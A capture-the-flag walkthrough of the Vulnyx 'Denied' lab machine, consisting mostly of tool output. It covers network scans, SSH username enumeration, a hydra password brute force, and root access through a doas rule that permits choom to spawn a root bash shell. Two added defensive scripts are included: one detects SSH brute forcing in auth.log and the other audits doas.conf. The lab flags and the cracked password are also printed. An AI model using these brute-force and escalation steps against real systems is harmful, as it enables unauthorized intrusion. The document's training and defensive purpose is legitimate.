Vulnyx-Denied-Walkthrough
城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.205 08:00:27:8d:4f:91 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e7:07:97 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.110 seconds (121.33 hosts/sec). 4 responded
export ip=192.168.60.205
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.205:22
Open 192.168.60.205:80
Open 192.168.60.205:8080
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-30 08:42 CST
Initiating ARP Ping Scan at 08:42
Scanning 192.168.60.205 [1 port]
Completed ARP Ping Scan at 08:42, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:42
Completed Parallel DNS resolution of 1 host. at 08:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:42
Scanning 192.168.60.205 [3 ports]
Discovered open port 8080/tcp on 192.168.60.205
Discovered open port 22/tcp on 192.168.60.205
Discovered open port 80/tcp on 192.168.60.205
Completed SYN Stealth Scan at 08:42, 0.07s elapsed (3 total ports)
Nmap scan report for 192.168.60.205
Host is up, received arp-response (0.00089s latency).
Scanned at 2025-05-30 08:42:57 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
8080/tcp open http-proxy syn-ack ttl 64
MAC Address: 08:00:27:8D:4F:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Enumerate the web directories.

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.205
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

Nothing useful there; port 8080 is the same, only the Apache default page.

No foothold on the web side.

So the only thing left to focus on is the SSH port.

Try logging in with an arbitrary user; it is denied.

❯ ssh aaa@$ip
The authenticity of host '192.168.60.205 (192.168.60.205)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.205' (ED25519) to the list of known hosts.
aaa@192.168.60.205: Permission denied (publickey).

Judging from the box's name, perhaps only a specific username avoids being denied.

The user akira is not rejected, which shows that this user exists on the target.

for i in $(cat /usr/share/seclists/Usernames/Names/names.txt);do ssh $i@$ip ;done
………………………………
akira@192.168.60.205's password:

Try brute-forcing the password; the credentials are akira:shakira.

❯ hydra -l akira -P /usr/share/wordlists/rockyou.txt ssh://$ip -I -e nsr
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-30 09:00:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344402 login tries (l:1/p:14344402), ~896526 tries per task
[DATA] attacking ssh://192.168.60.205:22/
[STATUS] 306.00 tries/min, 306 tries in 00:01h, 14344097 to do in 781:17h, 15 active
[22][ssh] host: 192.168.60.205 login: akira password: shakira
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-30 09:02:12
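Hydra's password spray above leaves a burst of failed-password lines from one source IP in sshd's auth log. As an added example (not part of the original walkthrough), here is a small awk-based check that flags any source reaching a failure threshold and reports whether that same source later authenticated successfully; the auth.log lines and the `ssh_bruteforce_report` helper are constructed for this example.

```shell
#!/bin/sh
# Added detection example, not code from the original walkthrough.
# The log lines are constructed; on Debian-family hosts sshd writes this
# shape to /var/log/auth.log.

make_sample_log() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
May 30 09:00:07 denied sshd[1201]: Failed password for akira from 192.168.60.100 port 50122 ssh2
May 30 09:00:07 denied sshd[1203]: Failed password for akira from 192.168.60.100 port 50124 ssh2
May 30 09:00:08 denied sshd[1205]: Failed password for invalid user aaa from 192.168.60.100 port 50126 ssh2
May 30 09:00:08 denied sshd[1207]: Failed password for akira from 192.168.60.100 port 50128 ssh2
May 30 09:00:09 denied sshd[1209]: Failed password for akira from 192.168.60.100 port 50130 ssh2
May 30 09:02:11 denied sshd[1330]: Accepted password for akira from 192.168.60.100 port 50988 ssh2
May 30 09:05:00 denied sshd[1402]: Failed password for bob from 192.168.60.1 port 40000 ssh2
EOF
  echo "$f"
}

# ssh_bruteforce_report FILE THRESHOLD
# Prints "<ip> <failures> <yes|no>" for every source IP whose failed-password
# count reaches THRESHOLD; "yes" means that IP later got "Accepted password"
# after the failures, i.e. the spray most likely found a valid credential.
ssh_bruteforce_report() {
  awk -v thr="$2" '
    # pull the address after the "from" token, which works for both the
    # plain and the "invalid user" variants of the message
    function src(   i) { for (i = 1; i <= NF; i++) if ($i == "from") return $(i + 1); return "" }
    /sshd\[[0-9]+\]: Failed password for/   { fails[src()]++ }
    /sshd\[[0-9]+\]: Accepted password for/ { ip = src(); if (fails[ip] >= thr) hit[ip] = 1 }
    END {
      for (ip in fails)
        if (fails[ip] >= thr) print ip, fails[ip], (ip in hit ? "yes" : "no")
    }' "$1"
}

# stand-alone run: a handful of failures from one address is already suspicious
f=$(make_sample_log)
ssh_bruteforce_report "$f" 3
rm -f "$f"
```

On a real host the same awk runs over /var/log/auth.log (or `journalctl -u ssh`), and a "yes" result is the line that should page someone.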

User Access

Connect over SSH.

❯ ssh akira@$ip
akira@192.168.60.205's password:
akira@denied:~$ id
uid=1000(akira) gid=1000(akira) grupos=1000(akira)
akira@denied:~$ cat user.txt
6acfb2803973dacc95152a873ba79255

There is no sudo, but doas is present.

However, the doas configuration cannot be read.

akira@denied:~$ sudo -l
-bash: sudo: orden no encontrada
akira@denied:~$ cat /etc/doas.conf
cat: /etc/doas.conf: Permiso denegado
akira@denied:~$ ls -al /etc/doas.conf
-rw-r----- 1 root root 55 may 18 12:52 /etc/doas.conf

Root Privilege Escalation

And doas is a setuid binary.

akira@denied:~$ find / -perm -u=s 2>/dev/null
/usr/bin/mount
/usr/bin/chsh
/usr/bin/doas
/usr/bin/passwd
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
akira@denied:~$ ls -al /usr/bin/doas
-rwsr-xr-x 1 root root 43184 jul 27 2022 /usr/bin/doas

So the task is to enumerate which programs doas allows us to run.

choom turns out to be executable as root.

akira@denied:~$ for i in $(ls /usr/bin);do doas -u root /usr/bin/$i 2>&1 |grep -v not;done
choom: no se ha especificado ni PID ni ORDEN
Escriba 'choom --help' para obtener más información.

/usr/bin/choom is a utility for displaying and adjusting a process's Out-Of-Memory (OOM) killer score.

The OOM Killer is a Linux kernel mechanism: when system memory runs critically low, it selects and kills certain processes to free memory and keep the whole system from going down. Every process has an **OOM score**; the higher the score, the more likely the OOM killer is to pick and kill that process when an OOM event occurs.

  • choom [opciones] -n number [--] order [args...]

    • This form launches a new command/program and sets its OOM score adjustment at the same time.
    • `--` is the convention that separates choom's own options from the command to run and its arguments.
    • For example, choom -n 500 -- my_custom_script.sh runs my_custom_script.sh and sets its OOM adjustment value to 500.
akira@denied:~$ doas -u root /usr/bin/choom -n 0 -- /bin/bash
root@denied:/home/akira# id
uid=0(root) gid=0(root) grupos=0(root)
root@denied:/home/akira# cat /root/root.txt
ea2118e462426513a247964eb8320c27
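The root path hinged on a doas rule that permits choom, a utility whose documented job is to exec another program. As an added example, not the box's configuration and not part of the original walkthrough, here is a POSIX shell audit that parses a doas.conf and flags permit rules with no cmd restriction or whose cmd is a known command launcher; the sample doas.conf, the `audit_doas_conf` helper and the launcher list are assumptions for this example (the box's real /etc/doas.conf was unreadable).

```shell
#!/bin/sh
# Added audit helper, not the box's real /etc/doas.conf (that file was
# unreadable) and not part of the original walkthrough.
# Assumption: these utilities exist to exec another program, so a doas rule
# that permits one of them as root is effectively "permit any command".
LAUNCHERS="choom env nice ionice nohup timeout stdbuf taskset setarch"

make_sample_conf() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# constructed sample doas.conf
permit persist akira as root cmd /usr/bin/choom
permit nopass :wheel as root
permit akira as root cmd /usr/bin/systemctl args restart nginx
EOF
  echo "$f"
}

# audit_doas_conf FILE: print one line per risky permit rule.
audit_doas_conf() {
  grep -Ev '^[[:space:]]*(#|$)' "$1" | grep -E '^[[:space:]]*permit' |
  while read -r rule; do
    # the word after "cmd" is the permitted command; absent means any command
    cmd=$(printf '%s\n' "$rule" |
          sed -n 's/.*[[:space:]]cmd[[:space:]][[:space:]]*\([^[:space:]]*\).*/\1/p')
    if [ -z "$cmd" ]; then
      echo "ANY-COMMAND: $rule"
      continue
    fi
    base=$(basename "$cmd")
    for l in $LAUNCHERS; do
      if [ "$base" = "$l" ]; then
        echo "LAUNCHER($base): $rule"
      fi
    done
  done
}

# stand-alone run over the constructed sample
f=$(make_sample_conf)
audit_doas_conf "$f"
rm -f "$f"
```

A rule that pins `args` (like the systemctl line) is not flagged because the target program cannot be steered into running something else; the fix for a flagged rule is to restrict it to a fixed argument list or drop it.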